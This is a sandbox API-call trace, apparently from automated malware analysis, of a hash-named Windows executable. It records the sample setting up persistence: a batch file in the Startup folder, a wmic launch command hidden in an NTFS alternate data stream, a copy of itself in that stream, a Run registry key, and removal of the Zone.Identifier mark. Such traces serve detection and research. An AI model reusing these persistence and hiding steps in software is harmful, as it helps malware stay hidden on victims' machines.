lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat", lpUsedDefaultChar=0x0) returned 96 [0134.479] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat") returned 96 [0134.479] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat") returned 96 [0134.479] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x37b0000 [0134.479] lstrcpyA (in: lpString1=0x37b0000, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat" [0134.479] VirtualFree (lpAddress=0x3770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.480] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat") returned 96 [0134.480] VirtualAlloc (lpAddress=0x0, dwSize=0x61, flAllocationType=0x3000, flProtect=0x4) returned 0x3770000 [0134.480] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat" [0134.480] VirtualFree (lpAddress=0x37b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.481] VirtualFree (lpAddress=0x37a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.481] lstrlenW (lpString="for /F \"usebackq tokens=*\" %%A in (\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start\") do %%A") returned 147 [0134.481] CreateFileA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\programs.bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0134.483] WriteFile (in: hFile=0x2e8, lpBuffer=0x3730000*, nNumberOfBytesToWrite=0x93, lpNumberOfBytesWritten=0x2daf870, lpOverlapped=0x0 | out: lpBuffer=0x3730000*, lpNumberOfBytesWritten=0x2daf870*=0x93, lpOverlapped=0x0) returned 1 [0134.485] CloseHandle (hObject=0x2e8) returned 1 [0134.486] VirtualFree (lpAddress=0x3770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.487] VirtualFree (lpAddress=0x3730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.488] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2daf66c, csidl=35, fCreate=0 | out: pszPath="C:\\ProgramData") returned 1 [0134.488] lstrlenW (lpString="C:\\ProgramData") returned 14 [0134.488] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3730000 [0134.488] lstrlenW (lpString="C:\\ProgramData") returned 14 [0134.488] lstrcpyW (in: lpString1=0x3730000, lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0134.488] lstrlenW (lpString=":ApplicationData") returned 16 [0134.488] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x3770000 [0134.489] lstrlenW (lpString=":ApplicationData") returned 16 [0134.489] lstrcpyW (in: lpString1=0x3770000, lpString2=":ApplicationData" | out: lpString1=":ApplicationData") returned=":ApplicationData" [0134.489] lstrlenW (lpString=":ApplicationData") returned 16 [0134.489] lstrlenW (lpString="C:\\ProgramData") returned 14 [0134.489] VirtualQuery (in: lpAddress=0x3730000, lpBuffer=0x2daf81c, dwLength=0x1c | out: lpBuffer=0x2daf81c*(BaseAddress=0x3730000, AllocationBase=0x3730000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.489] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x37a0000 [0134.489] VirtualFree (lpAddress=0x3730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.490] lstrcatW (in: lpString1="C:\\ProgramData", lpString2=":ApplicationData" | out: lpString1="C:\\ProgramData:ApplicationData") returned="C:\\ProgramData:ApplicationData" [0134.490] VirtualFree (lpAddress=0x3770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.491] lstrlenW (lpString="wmic process call create '\"") returned 27 [0134.491] VirtualAlloc (lpAddress=0x0, dwSize=0x38, flAllocationType=0x3000, flProtect=0x4) returned 0x3730000 [0134.491] lstrlenW (lpString="wmic process call create '\"") returned 27 [0134.491] lstrcpyW (in: lpString1=0x3730000, lpString2="wmic process call create '\"" | out: lpString1="wmic process call create '\"") returned="wmic process call create '\"" [0134.491] lstrlenW (lpString="C:\\ProgramData:ApplicationData") returned 30 [0134.491] VirtualAlloc (lpAddress=0x0, dwSize=0x3e, flAllocationType=0x3000, flProtect=0x4) returned 0x3770000 [0134.491] lstrlenW (lpString="C:\\ProgramData:ApplicationData") returned 30 [0134.491] lstrcpyW (in: lpString1=0x3770000, lpString2="C:\\ProgramData:ApplicationData" | out: lpString1="C:\\ProgramData:ApplicationData") returned="C:\\ProgramData:ApplicationData" [0134.492] lstrlenW (lpString="C:\\ProgramData:ApplicationData") returned 30 [0134.492] lstrlenW (lpString="wmic process call create '\"") returned 27 [0134.492] VirtualQuery (in: lpAddress=0x3730000, lpBuffer=0x2daf818, dwLength=0x1c | out: lpBuffer=0x2daf818*(BaseAddress=0x3730000, AllocationBase=0x3730000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.492] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x37b0000 [0134.492] VirtualFree (lpAddress=0x3730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.493] lstrcatW (in: lpString1="wmic process call create '\"", lpString2="C:\\ProgramData:ApplicationData" | out: lpString1="wmic process call create '\"C:\\ProgramData:ApplicationData") returned="wmic process call create '\"C:\\ProgramData:ApplicationData" [0134.493] VirtualFree (lpAddress=0x3770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.493] lstrlenW (lpString="\"'") returned 2 [0134.493] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x3730000 [0134.494] lstrlenW (lpString="\"'") returned 2 [0134.494] lstrcpyW (in: lpString1=0x3730000, lpString2="\"'" | out: lpString1="\"'") returned="\"'" [0134.494] lstrlenW (lpString="\"'") returned 2 [0134.494] lstrlenW (lpString="wmic process call create '\"C:\\ProgramData:ApplicationData") returned 57 [0134.494] VirtualQuery (in: lpAddress=0x37b0000, lpBuffer=0x2daf81c, dwLength=0x1c | out: lpBuffer=0x2daf81c*(BaseAddress=0x37b0000, AllocationBase=0x37b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.494] VirtualAlloc (lpAddress=0x0, dwSize=0x7a, flAllocationType=0x3000, flProtect=0x4) returned 0x3770000 [0134.494] VirtualFree (lpAddress=0x37b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.495] lstrcatW (in: lpString1="wmic process call create '\"C:\\ProgramData:ApplicationData", lpString2="\"'" | out: lpString1="wmic process call create '\"C:\\ProgramData:ApplicationData\"'") returned="wmic process call create '\"C:\\ProgramData:ApplicationData\"'" [0134.495] VirtualFree (lpAddress=0x3730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.496] lstrlenW (lpString=":start") returned 6 [0134.496] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3730000 [0134.496] lstrlenW (lpString=":start") returned 6 [0134.496] lstrcpyW (in: lpString1=0x3730000, lpString2=":start" | out: lpString1=":start") returned=":start" [0134.496] lstrlenW (lpString=":start") returned 6 [0134.496] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat") returned 96 [0134.496] VirtualQuery (in: lpAddress=0x3780000, lpBuffer=0x2daf81c, dwLength=0x1c | out: lpBuffer=0x2daf81c*(BaseAddress=0x3780000, AllocationBase=0x3780000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.496] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x3000, flProtect=0x4) returned 0x37b0000 [0134.497] VirtualFree (lpAddress=0x3780000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.498] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat", lpString2=":start" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start" [0134.498] VirtualFree (lpAddress=0x3730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.498] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x3730000 [0134.499] lstrlenW (lpString="wmic process call create '\"C:\\ProgramData:ApplicationData\"'") returned 59 [0134.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wmic process call create '\"C:\\ProgramData:ApplicationData\"'", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0134.499] VirtualAlloc (lpAddress=0x0, dwSize=0x3b, flAllocationType=0x3000, flProtect=0x4) returned 0x3780000 [0134.499] lstrlenW (lpString="wmic process call create '\"C:\\ProgramData:ApplicationData\"'") returned 59 [0134.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wmic process call create '\"C:\\ProgramData:ApplicationData\"'", cchWideChar=59, lpMultiByteStr=0x3780000, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wmic process call create '\"C:\\ProgramData:ApplicationData\"'", lpUsedDefaultChar=0x0) returned 59 [0134.499] lstrlenA (lpString="wmic process call create '\"C:\\ProgramData:ApplicationData\"'") returned 59 [0134.499] lstrlenA (lpString="wmic process call create '\"C:\\ProgramData:ApplicationData\"'") returned 59 [0134.499] VirtualAlloc (lpAddress=0x0, dwSize=0x3b, flAllocationType=0x3000, flProtect=0x4) returned 0x37c0000 [0134.500] lstrcpyA (in: lpString1=0x37c0000, lpString2="wmic process call create '\"C:\\ProgramData:ApplicationData\"'" | out: lpString1="wmic process call create '\"C:\\ProgramData:ApplicationData\"'") returned="wmic process call create '\"C:\\ProgramData:ApplicationData\"'" [0134.500] VirtualFree (lpAddress=0x3730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.500] lstrlenA (lpString="wmic process call create '\"C:\\ProgramData:ApplicationData\"'") returned 59 [0134.500] VirtualAlloc (lpAddress=0x0, dwSize=0x3c, flAllocationType=0x3000, flProtect=0x4) returned 0x3730000 [0134.501] lstrcatA (in: lpString1="", lpString2="wmic process call create '\"C:\\ProgramData:ApplicationData\"'" | out: lpString1="wmic process call create '\"C:\\ProgramData:ApplicationData\"'") returned="wmic process call create '\"C:\\ProgramData:ApplicationData\"'" [0134.501] VirtualFree (lpAddress=0x37c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.503] VirtualFree (lpAddress=0x3780000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.504] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x3780000 [0134.611] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start") returned 102 [0134.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start", cchWideChar=102, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 102 [0134.611] VirtualAlloc (lpAddress=0x0, dwSize=0x66, flAllocationType=0x3000, flProtect=0x4) returned 0x37c0000 [0135.224] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start") returned 102 [0135.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start", cchWideChar=102, lpMultiByteStr=0x37c0000, cbMultiByte=102, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start", lpUsedDefaultChar=0x0) returned 102 [0135.224] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start") returned 102 [0135.224] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start") returned 102 [0135.224] VirtualAlloc (lpAddress=0x0, dwSize=0x66, flAllocationType=0x3000, flProtect=0x4) returned 0x37d0000 [0135.225] lstrcpyA (in: lpString1=0x37d0000, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start" [0135.225] VirtualFree (lpAddress=0x3780000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.226] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start") returned 102 [0135.226] VirtualAlloc (lpAddress=0x0, dwSize=0x67, flAllocationType=0x3000, flProtect=0x4) returned 0x3780000 [0135.227] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start" [0135.227] VirtualFree (lpAddress=0x37d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.229] VirtualFree (lpAddress=0x37c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.230] lstrlenW (lpString="wmic process call create '\"C:\\ProgramData:ApplicationData\"'") returned 59 [0135.230] CreateFileA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\programs.bat:start" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\programs.bat:start"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0135.233] WriteFile (in: hFile=0x2e8, lpBuffer=0x3730000*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x2daf870, lpOverlapped=0x0 | out: lpBuffer=0x3730000*, lpNumberOfBytesWritten=0x2daf870*=0x3b, lpOverlapped=0x0) returned 1 [0135.235] CloseHandle (hObject=0x2e8) returned 1 [0135.314] VirtualFree (lpAddress=0x3780000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.315] VirtualFree (lpAddress=0x3730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.316] CopyFileW (lpExistingFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf.exe"), lpNewFileName="C:\\ProgramData:ApplicationData" (normalized: "c:\\programdata:applicationdata"), bFailIfExists=0) returned 1 [0135.330] VirtualFree (lpAddress=0x3770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.354] VirtualFree (lpAddress=0x37a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.355] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.356] VirtualFree (lpAddress=0x37b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.357] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", ulOptions=0x0, samDesired=0x20006, phkResult=0x2daf954 | out: phkResult=0x2daf954*=0x2e8) returned 0x0 [0135.357] lstrlenW (lpString="Images") returned 6 [0135.357] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3730000 [0135.357] lstrcpyW (in: lpString1=0x3730000, lpString2="Images" | out: lpString1="Images") returned="Images" [0135.358] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0135.358] GetProcessHeap () returned 0x7c0000 [0135.358] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x34) returned 0x7d58e8 [0135.358] RegSetValueExW (in: hKey=0x2e8, lpValueName="Images", Reserved=0x0, dwType=0x1, lpData="C:\\ProgramData\\images.exe", cbData=0x34 | out: lpData="C:\\ProgramData\\images.exe") returned 0x0 [0135.359] VirtualFree (lpAddress=0x3730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.360] GetProcessHeap () returned 0x7c0000 [0135.360] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7d58e8 | out: hHeap=0x7c0000) returned 1 [0135.361] RegCloseKey (hKey=0x2e8) returned 0x0 [0135.361] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0135.361] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x3730000 [0135.361] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0135.361] lstrcpyW (in: lpString1=0x3730000, lpString2="C:\\ProgramData\\images.exe" | out: lpString1="C:\\ProgramData\\images.exe") returned="C:\\ProgramData\\images.exe" [0135.361] lstrlenW (lpString=":Zone.Identifier") returned 16 [0135.361] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x3770000 [0135.362] lstrlenW (lpString=":Zone.Identifier") returned 16 [0135.362] lstrcpyW (in: lpString1=0x3770000, lpString2=":Zone.Identifier" | out: lpString1=":Zone.Identifier") returned=":Zone.Identifier" [0135.362] lstrlenW (lpString=":Zone.Identifier") returned 16 [0135.362] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0135.362] VirtualQuery (in: lpAddress=0x3730000, lpBuffer=0x2daf82c, dwLength=0x1c | out: lpBuffer=0x2daf82c*(BaseAddress=0x3730000, AllocationBase=0x3730000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.362] VirtualAlloc (lpAddress=0x0, dwSize=0x56, flAllocationType=0x3000, flProtect=0x4) returned 0x3780000 [0135.362] VirtualFree (lpAddress=0x3730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.363] lstrcatW (in: lpString1="C:\\ProgramData\\images.exe", lpString2=":Zone.Identifier" | out: lpString1="C:\\ProgramData\\images.exe:Zone.Identifier") returned="C:\\ProgramData\\images.exe:Zone.Identifier" [0135.363] VirtualFree (lpAddress=0x3770000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.364] DeleteFileW (lpFileName="C:\\ProgramData\\images.exe:Zone.Identifier" (normalized: "c:\\programdata\\images.exe:zone.identifier")) returned 0 [0135.364] VirtualFree (lpAddress=0x3780000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.365] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.366] VirtualFree (lpAddress=0x3740000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.367] lstrlenW (lpString="C:\\ProgramData\\images.exe") returned 25 [0135.367] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x3730000 [0135.367] lstrcpyW (in: lpString1=0x3730000, lpString2="C:\\ProgramData\\images.exe" | out: lpString1="C:\\ProgramData\\images.exe") returned="C:\\ProgramData\\images.exe" [0135.367] CreateProcessW (in: lpApplicationName="C:\\ProgramData\\images.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2daf868*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2daf8ac | out: lpCommandLine=0x0, lpProcessInformation=0x2daf8ac*(hProcess=0x2c8, hThread=0x2e8, dwProcessId=0x528, dwThreadId=0x50c)) returned 1 [0140.135] VirtualFree (lpAddress=0x3730000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.136] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.136] VirtualFree (lpAddress=0x3720000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.137] GetProcessHeap () returned 0x7c0000 [0140.137] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7f2bf8 | out: hHeap=0x7c0000) returned 1 [0140.137] VirtualFree (lpAddress=0x3710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.138] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.138] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.139] VirtualFree (lpAddress=0x36f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.139] VirtualFree (lpAddress=0x36e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.140] GetProcessHeap () returned 0x7c0000 [0140.140] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7d53e8 | out: hHeap=0x7c0000) returned 1 [0140.140] WSACleanup () returned 0 [0140.141] ReleaseMutex (hMutex=0x2b4) returned 0 [0140.141] CloseHandle (hObject=0x2b4) returned 1 [0140.141] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.141] RegCloseKey (hKey=0x2c4) returned 0x0 [0140.141] GetProcessHeap () returned 0x7c0000 [0140.142] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e7620 | out: hHeap=0x7c0000) returned 1 [0140.142] VirtualFree (lpAddress=0x3680000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.142] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.142] VirtualFree (lpAddress=0x3670000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.143] VirtualFree (lpAddress=0x3660000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.143] VirtualFree (lpAddress=0x3650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.144] GetProcessHeap () returned 0x7c0000 [0140.144] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7d58a8 | out: hHeap=0x7c0000) returned 1 [0140.144] VirtualFree (lpAddress=0x3760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.145] VirtualFree (lpAddress=0x36c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.146] VirtualFree (lpAddress=0x36a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.147] VirtualFree (lpAddress=0x36d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.147] VirtualFree (lpAddress=0x36b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.148] GetProcessHeap () returned 0x7c0000 [0140.149] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7e7828 | out: hHeap=0x7c0000) returned 1 [0140.149] VirtualFree (lpAddress=0x3640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.149] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.150] VirtualFree (lpAddress=0x3630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.150] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.151] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.152] GetProcessHeap () returned 0x7c0000 [0140.152] HeapFree (in: hHeap=0x7c0000, dwFlags=0x0, lpMem=0x7d5668 | out: hHeap=0x7c0000) returned 1 [0140.153] CoUninitialize () [0140.157] CoUninitialize () [0140.159] VirtualFree (lpAddress=0x7d0110, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.160] VirtualFree (lpAddress=0x7d16a0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.160] ReleaseMutex (hMutex=0x1c4) returned 0 [0140.160] CloseHandle (hObject=0x1c4) returned 1 [0140.160] VirtualFree (lpAddress=0x2e30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.161] VirtualFree (lpAddress=0xa10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.162] VirtualFree (lpAddress=0xa00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.163] VirtualFree (lpAddress=0x9f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.164] VirtualFree (lpAddress=0x9e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.729] VirtualFree (lpAddress=0x9d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.730] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.730] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.730] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.730] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.730] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.730] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.730] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.730] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.730] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.730] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.730] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.730] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.730] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.731] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0140.731] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) 